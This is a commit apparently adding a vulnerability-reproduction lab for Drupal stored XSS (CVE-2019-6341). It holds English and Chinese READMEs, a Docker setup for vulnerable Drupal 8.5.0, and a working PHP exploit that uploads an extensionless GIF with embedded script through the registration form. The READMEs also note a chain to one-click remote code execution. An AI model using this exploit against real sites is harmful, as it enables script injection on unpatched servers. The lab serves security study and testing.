first commit

drupal/CVE-2019-6341/README.md

@@ -0,0 +1,47 @@
+# Drupal Cross-Site Scripting by File Upload (CVE-2019-6341)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Drupal is a free and open-source web content management framework written in PHP.
+
+A cross-site scripting (XSS) vulnerability exists in Drupal 7.x before 7.65, Drupal 8.x before 8.5.14 and 8.6.x before 8.6.13. The vulnerability is caused by improper handling of file uploads in the file module or subsystem, which can lead to stored XSS attacks.
+
+References:
+
+- <https://www.drupal.org/sa-core-2019-004>
+- <https://www.zerodayinitiative.com/blog/2019/4/11/a-series-of-unfortunate-images-drupal-1-click-to-rce-exploit-chain-detailed>
+- <https://paper.seebug.org/897/>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable Drupal 8.5.0 server:
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080/` to access the Drupal installation page. Follow the default configuration steps to complete the installation. Since there is no MySQL environment, you can choose SQLite as the database.
+
+## Vulnerability Reproduction
+
+This vulnerability exploits a flaw in Drupal's file module that allows uploading a specially crafted file without extension. The file appears to be an image but actually contains HTML code with embedded JavaScript. When other users visit the link to this file, the XSS payload will be executed.
+
+By default, Drupal stores uploaded images in the `/sites/default/files/pictures/<YYYY-MM>/` directory.
+
+To exploit the vulnerability, use the PoC script from [thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal) to create and upload a malicious GIF file. Execute the following command, where the first argument is the target IP and the second is the target port:
+
+```
+php cve-2019-6341-exp.php 192.168.11.1 8080
+```
+
+![1](1.png)
+
+After successful upload, visiting the image location will trigger the XSS vulnerability:
+
+![2](2.png)
+
+Note:
+
+1. Chrome and Firefox browsers have built-in XSS filters, so it's recommended to use Edge or IE browsers for testing.
+2. The uploaded image name ends with "_0" due to Drupal's rule mechanism. For more details, see [Drupal 1-click to RCE Analysis](https://paper.seebug.org/897/)
+3. The chain of this bug and [CVE-2019-6339](../CVE-2019-6339/README.md), which can lead to remote code execution by 1 click

drupal/CVE-2019-6341/README.zh-cn.md

@@ -0,0 +1,45 @@
+# Drupal文件上传导致跨站脚本执行（CVE-2019-6341）
+
+Drupal是一个使用PHP编写的免费开源的Web内容管理框架。
+
+在Drupal 7.x < 7.65, Drupal 8.x < 8.5.14 和 8.6.x < 8.6.13 中，由于文件模块或子系统中对文件上传处理不当，导致攻击者可以上传一个没有扩展名的文件，该文件表面上是一个图片，但实际包含了嵌入JavaScript的HTML代码。当其他用户访问该文件的链接时，XSS代码将被执行。
+
+参考链接：
+
+- <https://www.drupal.org/sa-core-2019-004>
+- <https://www.zerodayinitiative.com/blog/2019/4/11/a-series-of-unfortunate-images-drupal-1-click-to-rce-exploit-chain-detailed>
+- <https://paper.seebug.org/897/>
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Drupal 8.5.0服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/`将会看到Drupal的安装页面。按照默认配置完成安装步骤。由于环境中没有MySQL，可以选择SQLite作为数据库。
+
+## 漏洞复现
+
+该漏洞利用了Drupal文件模块中的一个缺陷，允许上传特制的文件。该文件表面上是一个图片，但实际包含了嵌入JavaScript的HTML代码。当其他用户访问该文件的链接时，XSS代码将被执行。
+
+Drupal默认将上传的图片存储在`/sites/default/files/pictures/<YYYY-MM>/`目录下，并保留其原始文件名。
+
+要利用此漏洞，使用来自[thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal)的PoC脚本创建并上传恶意GIF文件。执行以下命令，其中第一个参数是目标IP，第二个参数是目标端口：
+
+```
+php cve-2019-6341-exp.php 192.168.11.1 8080
+```
+
+![1](1.png)
+
+上传成功后，访问图片位置即可触发XSS漏洞：
+
+![2](2.png)
+
+注意：
+
+1. Chrome和Firefox浏览器内置了XSS过滤器，建议使用Edge或IE浏览器进行测试。
+2. 上传的图片名称末尾带有"_0"是由于Drupal的规则机制。详细信息请参见[Drupal 1-click to RCE分析](https://paper.seebug.org/897/)
+3. 该漏洞与[CVE-2019-6339](../CVE-2019-6339/README.md)形成漏洞利用链，管理员只需点击一个恶意链接即可导致远程代码执行

drupal/CVE-2019-6341/blog-poc.php

@@ -0,0 +1,146 @@
+<?php
+/*
+usage: php poc.php <target-ip>
+
+Date: 1 March 2019
+Exploit Author: TrendyTofu
+Original Discoverer: Sam Thomas
+Version: <= Drupal 8.6.2
+Tested on: Drupal 8.6.2 Ubuntu 18.04 LTS x64 with ext4.
+Tested not wokring on: Drupal running on MacOS with APFS
+CVE : CVE-2019-6341
+Reference: https://www.zerodayinitiative.com/advisories/ZDI-19-291/
+
+*/
+
+$host = $argv[1];
+$port = $argv[2];
+
+$pk =   "GET /user/register HTTP/1.1\r\n".
+	"Host: ".$host."\r\n".
+	"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
+	"Accept-Language: en-US,en;q=0.5\r\n".
+	"Referer: http://".$host."/user/login\r\n".
+	"Connection: close\r\n\r\n";
+
+$fp = fsockopen($host,$port,$e,$err,1);
+if (!$fp) {die("not connected");}
+fputs($fp,$pk);
+$out="";
+while (!feof($fp)){
+  $out.=fread($fp,1);
+}
+fclose($fp);
+
+preg_match('/name="form_build_id" value="(.*)"/', $out, $match);
+$formid = $match[1];
+//var_dump($formid);
+//echo "form id is:". $formid;
+//echo $out."\n";
+sleep(1);
+
+$data = 
+"Content-Type: multipart/form-data; boundary=---------------------------60928216114129559951791388325\r\n".
+"Connection: close\r\n".
+"\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"mail\"\r\n".
+"\r\n".
+"test324@example.com\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"name\"\r\n".
+"\r\n".
+"test2345\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"files[user_picture_0]\"; filename=\"xxx\xc0.gif\"\r\n".
+"Content-Type: image/gif\r\n".
+"\r\n".
+"GIF\r\n".
+"<HTML>\r\n".
+"	<HEAD>\r\n".
+"		<SCRIPT>alert(123);</SCRIPT>\r\n".
+"	</HEAD>\r\n".
+"	<BODY>\r\n".
+"	</BODY>\r\n".
+"</HTML>\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"user_picture[0][fids]\"\r\n".
+"\r\n".
+"\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"user_picture[0][display]\"\r\n".
+"\r\n".
+"1\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"form_build_id\"\r\n".
+"\r\n".
+//"form-KyXRvDVovOBjofviDPTw682MQ8Bf5es0PyF-AA2Buuk\r\n".
+$formid."\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"form_id\"\r\n".
+"\r\n".
+"user_register_form\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"contact\"\r\n".
+"\r\n".
+"1\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"timezone\"\r\n".
+"\r\n".
+"America/New_York\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"_triggering_element_name\"\r\n".
+"\r\n".
+"user_picture_0_upload_button\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"_triggering_element_value\"\r\n".
+"\r\n".
+"Upload\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"_drupal_ajax\"\r\n".
+"\r\n".
+"1\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"ajax_page_state[theme]\"\r\n".
+"\r\n".
+"bartik\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"ajax_page_state[theme_token]\"\r\n".
+"\r\n".
+"\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"ajax_page_state[libraries]\"\r\n".
+"\r\n".
+"bartik/global-styling,classy/base,classy/messages,core/drupal.ajax,core/drupal.collapse,core/drupal.timezone,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,system/base\r\n".
+"-----------------------------60928216114129559951791388325--\r\n";
+
+$pk = 	"POST /user/register?element_parents=user_picture/widget/0&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\r\n".
+	"Host: ".$host."\r\n".
+	"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\n".
+	"Accept: application/json, text/javascript, */*; q=0.01\r\n".
+	"Accept-Language: en-US,en;q=0.5\r\n".
+	"X-Requested-With: XMLHttpRequest\r\n".
+	"Referer: http://" .$host. "/user/register\r\n".
+	"Content-Length: ". strlen($data). "\r\n".
+	$data;
+
+echo "uploading file, please wait...\n";
+
+for ($i =1; $i <= 2; $i++){
+$fp = fsockopen($host,$port,$e,$err,1);
+if (!$fp) {die("not connected");}
+fputs($fp,$pk);
+$out="";
+while (!feof($fp)){
+  $out.=fread($fp,1);
+}
+fclose($fp);
+
+// echo "Got ".$i."/2 500 errors\n";
+// echo $out."\n";
+sleep(1);
+}
+
+echo "please check /var/www/html/drupal/sites/default/files/pictures/YYYY-MM\n";
+
+?>

drupal/CVE-2019-6341/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/drupal:8.5.0
+   ports:
+    - "8080:80"